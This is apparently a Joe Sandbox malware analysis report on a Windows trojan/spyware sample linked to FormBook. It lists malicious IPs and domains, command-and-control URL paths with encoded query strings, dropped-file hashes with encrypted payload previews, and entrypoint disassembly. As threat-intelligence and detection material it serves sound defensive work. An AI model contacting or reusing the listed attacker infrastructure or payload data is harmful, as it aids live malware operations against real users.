                                          https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000006.00000002.4192324042.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000004452000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000006.00000002.4192324042.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000004452000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.value-domain.com/modall.phpXWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          91.195.240.94
                                          		www.rssnewscast.comGermany
                                          		47846SEDO-ASDEtrue
                                          154.215.72.110
                                          		www.3xfootball.comSeychelles
                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          195.110.124.133
                                          		elettrosistemista.zipItaly
                                          		39729REGISTER-ASITtrue
                                          15.197.240.20
                                          		www.donnavariedades.comUnited States
                                          		7430TANDEMUStrue
                                          54.65.172.3
                                          		www.kasegitai.tokyoUnited States
                                          		16509AMAZON-02UStrue
                                          116.50.37.244
                                          		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                          		18046DONGFONG-TWDongFongTechnologyCoLtdTWtrue
                                          85.159.66.93
                                          		natroredirect.natrocdn.comTurkey
                                          		34619CIZGITRtrue
                                          15.197.212.58
                                          		www.liangyuen528.comUnited States
                                          		7430TANDEMUStrue
                                          66.29.149.46
                                          		www.techchains.infoUnited States
                                          		19538ADVANTAGECOMUStrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1501659
                                          Start date and time:2024-08-30 09:38:10 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:8htbxM8GPX.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:8a854f74c740374fbd90a0d1b4c6012d.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@16/9
                                          EGA Information:
                                          • Successful, ratio: 80%
                                          HCA Information:
                                          • Successful, ratio: 88%
                                          • Number of executed functions: 35
                                          • Number of non-executed functions: 317
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: 8htbxM8GPX.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          03:40:11API Interceptor10590692x Sleep call for process: netbtugc.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          91.195.240.94FBOZtotG0B.exeGet hashmaliciousFormBookBrowse
                                          • www.arthurenathalia.com/pnug/?2dspOd=Taa6V29iU4ZPeKvUYDt3LHX91QjVIjLw+5MplSeQp3jQox/1ma7x+/vioItQ8eRnlCKMzdjw/A==&vRitR=02J8TVd8MN
                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                          • www.wearepartisan.rocks/h209/?CR=_BZD&cr=EckcWFY7Fijf0E/ZEPQnTwxF0PMFySB9EYISqm+Kivdyb/zGR+MwLkPV5z1RTuX6BjG7
                                          rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                          • www.rssnewscast.com/fo8o/
                                          QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                          • www.rssnewscast.com/fo8o/
                                          bum2sl4tSW66Q5O.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.seancollinsmusic.com/ps15/?t8o4=IiUdWomF5k9qaWufAEOF1gY9kHVftwkJ6cV9tSoeDtYAHjCeVDLi568qZcu0mi0k9Trm&jPj8q=pFQLwhtH0
                                          5.exeGet hashmaliciousFormBookBrowse
                                          • www.nadiiadrinkscoffee.com/ge34/?Hp=X6AHZfrXbRHH7xE&pP=DtaDJi3z2nipX4nJS/IcJCcbDk/4k1gE0+TxNtH8tFZPjGhx/2qD/OBkCIHBCYb1eipf
                                          factura.exeGet hashmaliciousFormBookBrowse
                                          • www.ssgame56c.org/qpcj/?IVD=vTEpW4TmB&PCKydxRp=hXmtMExE2v9HEeiW+ulHLkzTySI3TL5baDMJUDroKowqF3JNdygLwqeM0chXN5g2/8j8rpp6Ovu5nc6C/eq8J6bvYVTB8B/ZOQ8YY77+xTTm
                                          Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                          • www.rssnewscast.com/fo8o/
                                          wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                          • www.rssnewscast.com/fo8o/?xVY=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&Nz=LPhpDRap3
                                          opp46lGmxd.exeGet hashmaliciousFormBookBrowse
                                          • www.rssnewscast.com/fo8o/
                                          154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                          • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                          N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                          • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                          • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                          195.110.124.133Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                          • www.marcoiozia.info/6u21/
                                          Document_pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.marcoiozia.info/1a0o/
                                          ptsss.exeGet hashmaliciousFormBookBrowse
                                          • www.maggimilano.fun/aj6h/
                                          z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                                          • www.maggimilano.fun/c9b6/
                                          #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.maggimilano.fun/b3tb/
                                          rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                          • www.elettrosistemista.zip/fo8o/
                                          00451.exeGet hashmaliciousFormBookBrowse
                                          • www.maggimilano.fun/aj6h/
                                          Payment advice.exeGet hashmaliciousFormBookBrowse
                                          • www.emme4.online/dujn/
                                          Quotation-581024.exeGet hashmaliciousFormBookBrowse
                                          • www.emme4.online/dujn/
                                          QUOTATION.exeGet hashmaliciousFormBookBrowse
                                          • www.emme4.online/dujn/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.donnavariedades.comrPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                          • 15.197.240.20
                                          QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                          • 15.197.240.20
                                          www.3xfootball.comSecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          opp46lGmxd.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          POWERLINE-AS-APPOWERLINEDATACENTERHKDocument_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 154.92.53.201
                                          ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 154.92.59.24
                                          SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                          • 154.215.72.110
                                          firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                          • 154.221.35.193
                                          firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                          • 154.218.41.162
                                          Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                          • 154.92.59.24
                                          file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                          • 154.92.52.196
                                          nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                          • 156.253.238.121
                                          nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                                          • 156.253.238.124
                                          z42ordemdecomprapdf.exeGet hashmaliciousFormBookBrowse
                                          • 156.242.144.113
                                          TANDEMUShttp://attnet-103116.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                          • 15.197.193.217
                                          http://bt-103020.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                          • 15.197.193.217
                                          http://btinternet-108389.weeblysite.com/Get hashmaliciousUnknownBrowse
                                          • 15.197.193.217
                                          http://bt-109929.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                          • 15.197.193.217
                                          http://mail-107765.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                          • 15.197.193.217
                                          http://shaw-104552.weeblysite.com/Get hashmaliciousUnknownBrowse
                                          • 15.197.193.217
                                          https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
                                          • 15.197.193.217
                                          https://decktop.us/MUYKd1Get hashmaliciousUnknownBrowse
                                          • 15.197.213.252
                                          sxs.exeGet hashmaliciousUnknownBrowse
                                          • 15.197.204.56
                                          https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                          • 15.197.137.111
                                          REGISTER-ASITCurriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          Document_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          ptsss.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 195.110.124.133
                                          z55FACTURADEPROFORMApdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 81.88.57.70
                                          Transferencia bancaria.scr.exeGet hashmaliciousFormBookBrowse
                                          • 81.88.57.70
                                          rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          00451.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          Payment advice.exeGet hashmaliciousFormBookBrowse
                                          • 195.110.124.133
                                          SEDO-ASDEUnmxRI.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 91.195.240.19
                                          Payment Advice.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.19
                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                          • 91.195.240.19
                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                          • 91.195.240.19
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.19
                                          proforma invoice.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.19
                                          QSFD.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.12
                                          FBOZtotG0B.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.94
                                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                          • 91.195.240.19
                                          Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 91.195.240.123

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                          Download File
                                          Process:C:\Windows\SysWOW64\netbtugc.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\aut552D.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\8htbxM8GPX.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):270848
                                          Entropy (8bit):7.993357154635026
                                          Encrypted:true
                                          SSDEEP:6144:BQjeajrOfEbxL1LjIgdHXhviCFQ2x+4soepn2qF0x4e:S9WfEPvIqhvPFQ2U4socG
                                          MD5:DEFF23768785CC58C67841D238BFAE79
                                          SHA1:C854A8A729CF3EDC4FFE5751DA29EE92912A58B5
                                          SHA-256:E8ECC33DC055881709C6C7216C29D3C23FA1A44E5C70EB1D1C0813E06E1AF73F
                                          SHA-512:6FB645B7C5706559F9C308C85E94F5BA4C413AFFA9D0F568A79720A7B97013C846BC190D3F40565AE48E3E608120615D66CC58897D794AF330659ACEE6D2082A
                                          Malicious:false
                                          Reputation:low
                                          Preview:...d.PBIHl.Q..r.6I...`7Y...ITSNJ6JPBIH4QGXRITSNJ6JPBIH4QG.RIT]Q.8J.K.i.P..s.<:=jF8?%;)Yq$9<';'n(Sj"7'h]?g...t>!.Sd]OCl4QGXRIT*OC.w0%.uT6.e2..I...p0%.R...d2..I...v0%..]2/e2..SNJ6JPBI.qQG.SHT.&.iJPBIH4QG.RKUXOA6J@FIH4QGXRIT.[J6J@BIH.UGXR.TS^J6JRBIN4QGXRITUNJ6JPBIH.UGXPITSNJ6HP..H4AGXBITSNZ6J@BIH4QGHRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRIT}:/N>PBI.;UGXBITS^N6J@BIH4QGXRITSNJ6jPB)H4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBI

                                          C:\Users\user\AppData\Local\Temp\aut554D.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\8htbxM8GPX.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):43578
                                          Entropy (8bit):7.8252747027350456
                                          Encrypted:false
                                          SSDEEP:768:QasIJwX38qZC0p5rIGpDvUDQKK4WeCSJhAgsaPAOsxNaZjlPaU:zsIGX3rCkIsvUDQPehEGMNaDyU
                                          MD5:EF85C6FA12173EC4B6EE05D1201656E5
                                          SHA1:00C1D21B296193A1FA573B22AC88D0D3F82CC93F
                                          SHA-256:265DBDAF7FAFCA3929CA6B879012A1211AA8B7770BEC348D6E4116D64526D5B9
                                          SHA-512:D85655C1D5DE9B8D91BC0473B6F3B98240AC80918E2089D0AC60DA7B36CDA217C84273A0B8B1474BB3C4A39D46A3A0AE6F9F9590CFE6375F6AAD4DD9F1F4D3DF
                                          Malicious:false
                                          Preview:EA06..P...(.y.Zg5.....6.T..Z\.gT..(S9.Zm5..ty..6..s...eF..).9."g0...3Z..mD..i.9.,..$.j..eB.......aT..).9.>g0....p.6qD..i.9.*g5.`)s9.Zm2...5....H....9...&.3U...3.Q@....iT.M*.9..AB.L..i.bg7...T..h.X.......g6..K ....5.L...qQ.L..9.>g6.M..`.....<*.9.$...l).......j..D.cJ.L.39....FS..*H.d..............3.S..Jx..6........<......yU...9....6...K.T.sW..F.P...6..@C...g3.L...H.|.)...d..Q.s.d.sI..*@(...%.L.H...gX....p..E..,J..mI...[..Fg4.....vd..R@7...6.zh.........r......QfsP.0.4.L....8.)).9...f...T .......4i..3........nM.@. ..W.X@..X......@!..@..(.9..m4..U..H..6...Q*x....R...@.uM.Q.C.#.3..l.6..g3.L.`V...S... AUP....g ............U@0*..t..S..........I...Y.M.Si..m6.M....6.Pf.*\.cI...S0).....R. ...T..l@!.Fg9....@...6.Q..P....4M.........U.J..]O... +5..B...@....B.&..P..mK.B.#J......$.`( .R...T..*..!.i.0'fqJ.M).B....V&.j....x`.....D .......m...j....*....2...j...M.M.......PT&s*.....L...C.......p..V.........*`.......l.@E.r..U@Z*@.$.S.`...6P@Z ......i.#E ....L....AR.Lis0..gP..

                                          C:\Users\user\AppData\Local\Temp\putrefactible

                                          Download File
                                          Process:C:\Users\user\Desktop\8htbxM8GPX.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):270848
                                          Entropy (8bit):7.993357154635026
                                          Encrypted:true
                                          SSDEEP:6144:BQjeajrOfEbxL1LjIgdHXhviCFQ2x+4soepn2qF0x4e:S9WfEPvIqhvPFQ2U4socG
                                          MD5:DEFF23768785CC58C67841D238BFAE79
                                          SHA1:C854A8A729CF3EDC4FFE5751DA29EE92912A58B5
                                          SHA-256:E8ECC33DC055881709C6C7216C29D3C23FA1A44E5C70EB1D1C0813E06E1AF73F
                                          SHA-512:6FB645B7C5706559F9C308C85E94F5BA4C413AFFA9D0F568A79720A7B97013C846BC190D3F40565AE48E3E608120615D66CC58897D794AF330659ACEE6D2082A
                                          Malicious:false
                                          Preview:...d.PBIHl.Q..r.6I...`7Y...ITSNJ6JPBIH4QGXRITSNJ6JPBIH4QG.RIT]Q.8J.K.i.P..s.<:=jF8?%;)Yq$9<';'n(Sj"7'h]?g...t>!.Sd]OCl4QGXRIT*OC.w0%.uT6.e2..I...p0%.R...d2..I...v0%..]2/e2..SNJ6JPBI.qQG.SHT.&.iJPBIH4QG.RKUXOA6J@FIH4QGXRIT.[J6J@BIH.UGXR.TS^J6JRBIN4QGXRITUNJ6JPBIH.UGXPITSNJ6HP..H4AGXBITSNZ6J@BIH4QGHRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRIT}:/N>PBI.;UGXBITS^N6J@BIH4QGXRITSNJ6jPB)H4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBIH4QGXRITSNJ6JPBI

                                          C:\Users\user\AppData\Local\Temp\syphilous

                                          Download File
                                          Process:C:\Users\user\Desktop\8htbxM8GPX.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):86022
                                          Entropy (8bit):4.179593456168893
                                          Encrypted:false
                                          SSDEEP:1536:7aoDtotXC7WWN2oReBrd1X44DncaNOYWLz:7aotvtjwDnfy
                                          MD5:66C9DD7ED83270E0881326E08458078D
                                          SHA1:536D58D51DBA75DF01CD35A92160EDDBEC932564
                                          SHA-256:74A94A6CA80AF1FC390204BBF5D7DE681EF6C54026FB801CBD7940BBC0197C30
                                          SHA-512:6988B2618E279725BB3F429E4F21B3506FD34BBB1FE28A6135A5AD7FFDA6969B30D0A424CB4BD99A36ECE7572D24ACB5C8885CCCD8FD90F85F04D4F608E31048
                                          Malicious:false
                                          Preview:30G78V35O35Y38S62S65K63T38B31V65A63G63S63R30R32F30N30H30Y30H35C36D35L37K62S38V36P62B30B30Z30T30M30O30E36G36G38D39M34J35T38K34V62O39Y36J35W30M30S30L30G30N30Z36R36E38D39Z34T64W38G36B62P61X37W32J30T30F30A30M30L30F36U36D38V39Y35F35H38V38Q62X38O36L65V30R30H30T30P30I30F36R36N38G39S34T35L38H61J62Y39E36V35N30L30I30A30A30A30E36Y36Q38A39G34N64O38O63K62X61A36Y63S30T30Y30U30W30X30P36A36S38J39W35V35G38Z65M62O38F33D33S30I30L30M30S30P30E36C36F38L39I34R35T39H30Y62D39V33X32H30W30W30E30R30N30B36I36L38K39Q34Q64X39Y32Q62I61J32T65W30G30L30E30U30O30V36B36E38A39E35D35V39X34Z62J38R36H34D30S30E30A30B30X30N36J36E38F39C34E35Z39D36C62Z39A36W63T30E30K30V30I30T30D36G36T38O39E34K64H39Q38I62Y61C36Y63O30P30O30J30I30H30E36M36W38L39J35B35X39H61G33N33A63Z30S36J36Y38V39T34V35O39W63J62Y39D36S65D30A30U30X30S30M30Y36L36P38J39D38I64V34S34Y66J66E66Z66I66R66A62K61I37R34W30U30K30O30R30P30G36V36T38F39Q39B35K34P36D66F66L66A66C66O66E62G38X36Y34Z30Y30O30A30Y30B30E36U36W38A39P38R35B34K38Z66W66K66O66R66P66A62O39X36F63K30G30F30G30O30H3

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.128771736447649
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:8htbxM8GPX.exe
                                          File size:1'244'672 bytes
                                          MD5:8a854f74c740374fbd90a0d1b4c6012d
                                          SHA1:828660b6c850f9f20d1ca2aac4432fdda991dee2
                                          SHA256:821475247fd0e03841c0d5dd9f0189bc6afb8932a8915a802e102659ca55fd11
                                          SHA512:fb1608a174a619cd7860b171547b57aa229ffb5a915bd4ac772374438b3cef5b523557e5d9f6c214143760305b3163e70957e43db341cab9a52c6a71631973fb
                                          SSDEEP:24576:EqDEvCTbMWu7rQYlBQcBiT6rprG8acL2wA+ZSH9VxY:ETvC/MTQYxsWR7aciwPSdV
                                          TLSH:F945CF0273C1C062FF9B92334B5AF6515BBC6A260123E61F13981DB9BE705B1563E7A3
                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                          File Icon

                                          Icon Hash:aaf3e3e3938382a0

                                          Static PE Info

                                          General

                                          Entrypoint:0x420577
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66CEFCA4 [Wed Aug 28 10:32:04 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:1
                                          File Version Major:5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:948cc502fe9226992dce9417f952fce3

                                          Entrypoint Preview

                                          Instruction
                                          call 00007F0B3CDDFC93h
                                          jmp 00007F0B3CDDF59Fh
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          push dword ptr [ebp+08h]
                                          mov esi, ecx
                                          call 00007F0B3CDDF77Dh
                                          mov dword ptr [esi], 0049FDF0h
                                          mov eax, esi
                                          pop esi
                                          pop ebp
                                          retn 0004h
                                          and dword ptr [ecx+04h], 00000000h
                                          mov eax, ecx
                                          and dword ptr [ecx+08h], 00000000h
                                          mov dword ptr [ecx+04h], 0049FDF8h
                                          mov dword ptr [ecx], 0049FDF0h
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          push dword ptr [ebp+08h]
                                          mov esi, ecx
                                          call 00007F0B3CDDF74Ah
                                          mov dword ptr [esi], 0049FE0Ch
                                          mov eax, esi
                                          pop esi
                                          pop ebp
                                          retn 0004h
                                          and dword ptr [ecx+04h], 00000000h
                                          mov eax, ecx
                                          and dword ptr [ecx+08h], 00000000h
                                          mov dword ptr [ecx+04h], 0049FE14h
                                          mov dword ptr [ecx], 0049FE0Ch
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          mov esi, ecx
                                          lea eax, dword ptr [esi+04h]
                                          mov dword ptr [esi], 0049FDD0h
                                          and dword ptr [eax], 00000000h
                                          and dword ptr [eax+04h], 00000000h
                                          push eax
                                          mov eax, dword ptr [ebp+08h]
                                          add eax, 04h
                                          push eax
                                          call 00007F0B3CDE233Dh
                                          pop ecx
                                          pop ecx
                                          mov eax, esi
                                          pop esi
                                          pop ebp
                                          retn 0004h
